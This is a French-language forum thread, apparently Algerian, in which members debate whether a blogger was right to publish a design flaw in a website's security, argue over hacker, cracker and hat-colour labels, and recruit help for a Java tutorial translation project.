- "Avec tous mes respects mes chers frere" on doit toujours respecter ceux a qui on s'adresse même si on n'est pas d'accord avec eux... tu devrai le savoir amigo ! sauf si t'as un coeur noir :eek: lol

- "Merci" <---> De quoi ? d'avoir traiter tout le monde d'imbécile ?!!!
N'analyse pas comme quelqu'un qui utilise 1% de son cerveau t'es plus intelligent que ça et je le sais :confused: :p

Merci pour la lecture de mon message jusqu'a la fin

PS: Ce n'est qu'une discution ;)
Bien dit ! Allah ya3ték essaha ;)

Remarque pertinante : Tu parles beaucoup dans ce thread pour quelqu'un qui voulait le fermer :D

Remarque pertinante : Tu parles beaucoup dans ce thread pour quelqu'un qui voulait le fermer :D

Entierement d'accord loool c'est parce qu'ils m'obligent :D :p

Entierement d'accord loool c'est parce qu'ils m'obligent :D :p

lol :D c'est parceque personne ne l'avoue mais ils adorent tous parler de ça, y'en a même qui adorent dénigrer les autres :D alors ils font marcher la conversation ;)

La discussion a dérivé vers d'autres cieux apparemment.

Je trouve qu'il a raison de le dire mais par contre s'il voulait devenir un bon gars, il ne devrait pas fournir des informations sur la faille/les failles du site en question, parce que cela donne des idées noirs a ceux qui voulent faire des dégats !

Il a le droit de dire ce qu'il veut dans son blog, mais personnelement je le considere comme un pirate aussi parce qu'il avait fournit des informations sur la faille tout simplement.

La "faille" en question est du type que j'appel de "design" ou de "conception"...et rassurez-vous, ce n'est pas qui a inventé ça :)

Pourquoi j'ai publié ça ? il ya 2 choses :

1- pour donner mon avis sur le fait que les vulns de conception ou de design sont aussi importantes que les vulns de conf ou de programmation. J'oserais supposer même que si toutes les failles des serveurs du Cerist seraient corrigées (celles que bcq ont découverts et même divulguées..ce je n'ai pas fait), ces types de vulns passent généralement inaperçues. En plus, je ne suis pas le seul qui parle de ça, il y a d'autres plus compétents. Une étude de l'Université du Michigan, "Analyzing Web Sites For User-Visible Security Design Flaws", s'est penchée sur ce type de faille dans les sites des banques US (voir par exemple http://techno.branchez-vous.com/actualite/2008/07/banques_en_ligne_nombreuses_fa.html)

2- Ce que j'ai mis dans mon article, n'est pas exploitable directement, il faut trouver les mot de passe non ? si j'avais le choix entre traité de pirate et de celui qui a découvert une pseudo-faille" je choisirais volontier le dernier :)

- Moi j'ai choisi d'etre un admin qui ne se moque pas de l'intelligence des hackers, et un hacker qui ne defface pas et montre aux admins qu'ils ne sont pas plus fort que les autres

Des "Hackers" oui, mais pas des défaceurs / Script Kiddies....sinon je respecte ton choix et l'approuve même.

N'analyse pas comme quelqu'un qui utilise 1% de son cerveau t'es plus intelligent que ça et je le sais :confused: :p

Toi aussi , je crois tu es plus "raisonnable" que laisse entendre ton message. Ma réponse, je la savais "brutale", et j'ai pris le risque de la poster...je voulais te faire montrer ce que (au moins moi et peut-ête d'autres) ont ressentis de ton message...crois-le ou non !

De toute façon je m'excuse.

Toi aussi , je crois tu es plus "raisonnable" que laisse entendre ton message. Ma réponse, je la savais "brutale", et j'ai pris le risque de la poster...je voulais te faire montrer ce que (au moins moi et peut-ête d'autres) ont ressentis de ton message...crois-le ou non !
NOTE: Ce message n'est nullement pour défendre les hackers, vous saurez pourquoi plus tard (il n'ont pas besoin d'être défendu ;) )

Si tu parles de la partie où il traite et les admins et les hackers d'idiots, et il oublie les pirates, je suis d'acord avec toi.

Le fait qu'ils (lui et les autres) insultent les hackers, et s'auto-produisent des définitions de je ne sais où ... c'est très grave. Un nom a un sens.. Un hacker est un hacker, un pirate est un pirate et slamat, pourquoi nommez vous les choses avec des noms qui diffèrent (TOTALEMENT) de sens?

Sinon, pour revenir au sujet de la discussions, je suis tout à fait pour ce que SecDz a dit, son billet était assez bien présenté. Moi je l'aurait présenté sous une autre forme/titre, parler du fait qu'il faut toujours donner le strict minimum d'information au visiteur tant qu'il n'est pas identifié, et présenter un éxemple d'un site beta présent sur le marché sans pour autant donner le lien du site. Ce qui reviendra à une démarche purement Grise ;)

Et je retermine ça par un très beau message fait par un ami , et ce message est très connu sur le "wall of shame" :
It seems like you're always hearing in the news about hackers who are getting put in jail for "*******" into websites and stealing vital information. What the public doesn't know is, it's not hackers who are breaking into those sites, it's crackers; a totally different thing! Crackers are the one's who are cracking into websites, crashing networks, infecting online users with virii and simply causing mayhem! But the media has put a sterotype all over hacker name claiming that they're the one's to blame for all the damage done! What they dont know is, hackers are the one's who made the Internet and the World Wide Web! Hackers are the one's who are testing security, making firewalls, anti-virus programs and other security related programs. But with the sterotyping that the media has put all over the hacker name companies are shutting down ******* related sites, getting people fired from their jobs because they're suspected of being a hacker and simply giving hackers a bad name. If only the media and the public could see the truth behind all this, they would truly know that hackers are the people trying to protect online users, such as yourself, from the evil grasps of crackers! But until the media sees that they're wrong...hackers may never get the praise that they so rightfully deserve.

Peut être que vous avez remarquer le mot "Gris" dans mon message en haut. En fait le Gris est effectivement mi-blanc mi-noir, le blanc c'est tellement blanc que ça se sallis très vite ;), et le noir c'est pas beau. Le gris c'est celui qui supporte le plus la poussière.

Non là je ne parle pas de quelle couleur choisir pour votre chemise, je parle bel et bien des différentes catégories des gars de la sécurité (je dis pas Hacker encore)

Les White sont le "bon hackers" ils bossent pour le bien de l'informatique , c'est grace à eux que tout ce-ci existe, vos PC, L'internet, le WWW, toute l'informatique :) , au début (un peu d'histoire c'est bien) , pas très loin de ça, tous les soft évoluaient avec des "hacks" (en français, des bidouillages, d'où le terme hacker :) ) , ça veut pas dire que c'était de la merde ;).

Pourquoi parler de bidouillage? c'est simple, l'informatique n'était pas aussi standardisée que maintenant. et créer un programme pour faire marcher quelque chose était de l'art (ah , ça me rappelle mon prof qui a dit "l'art en informatique tend à mourir", il avait raison) , un seul hacker faisait tout un programme pour faire marcher la fonction X, un autre prend la source , la hack un peu et le rend meilleur et ajoutes des fonctionnalitées..

Vous avez compris, il est 2h du mat, je vais pas trop écrire :)

Les Blacks sont le "mal", en d'autre terme des crackers (en majorité hein , car certain whites finissent par subir de la préssion et se salissent et deviennent souvent noir ;)), ils pourrissent la vie de tout le monde (indirectement) .

Les Gris c'est mes préférés, ce n'est ni trop bon, ni hypocrite ni méchant, comme on dit "khayrou el oumouri awssatouha", ça programme, ça aide à construire, ça ne détruit pas, mais ça bosse pas dasn un milieu controlé (comme les whites)

Les Script kiddies sont ... euh, les ratés de la société : http://fr.wikipedia.org/wiki/Script_kiddie << je vais pas me fatiguer à parler d'eux.

au fait, il ne faut pas confondre skiddie et black hat, au moins ces derniers savent ce qu'il font et maitrisent leurs domaines (on les respectent de ce point de vu)

Maintenant, Pourquoi on n'a pas besoin de défendre les hackers? car ils s'en foutent totalement qu'on les insultent, entre vrai informaticiens on se respecte mutuellement , on reconnait les compétences, et on s'en fout du reste, on bosse pour avoir une auto-satisfaction du fait qu'on fait notre devoir de transmettre le savoir qu'on a.

En fait, pour ceux qui sont arrivé jusque là (fin du message :)) et sont intéressé de travailler avec moi et un ami sur un petit projet , c'est pas rénumérable ;), c'est pour le bien de la communauté francophone, envoyez moi un email à mr.bluby[at]gmail<dot>com , je vous expliquerai à quoi consiste le projet .

wa sallam

@Blub

Très bien dit...

Rien d'autre a ajouté, et je confirme le fait d'avoir fait quelques erreurs avec SecDz :)
donc passant aux choses serieuses, j'essaierai de te contacter Blub pour en savoir plus sur ton projet, quoique moi aussi j'ai quelques projets et je cherche des gens qui s'interessent.

Mes salutations

En pour le projet j'y bosse avec Knuthy, on a décidé de reprendre un ancien projet de traduction du The Java Tutorials (l'officiel de Sun), on a juste un petit problème de licence avant de pouvoir publier, on a repris le projet il y a quelques jours, on fait passé tout en LaTeX pour fournir une version bien formaté et qui peut être disponible en offline (pdf,ps,dvi) et en online HTML (LaTeX to Web). On aura prochainement un autre projet (on dois decider sur quelques trucs d'abord) ça sera en Java inchallah.
Knuthy va bosser sur une nouvelle série de posts consernant bash, ça sera une série d'un poste par semaine et ça sera Scénario+solution.
On bosse aussi sur un blog, et vu qu'on est tous les deux algérien, c'est l'un des blogs anglais Algérien ;)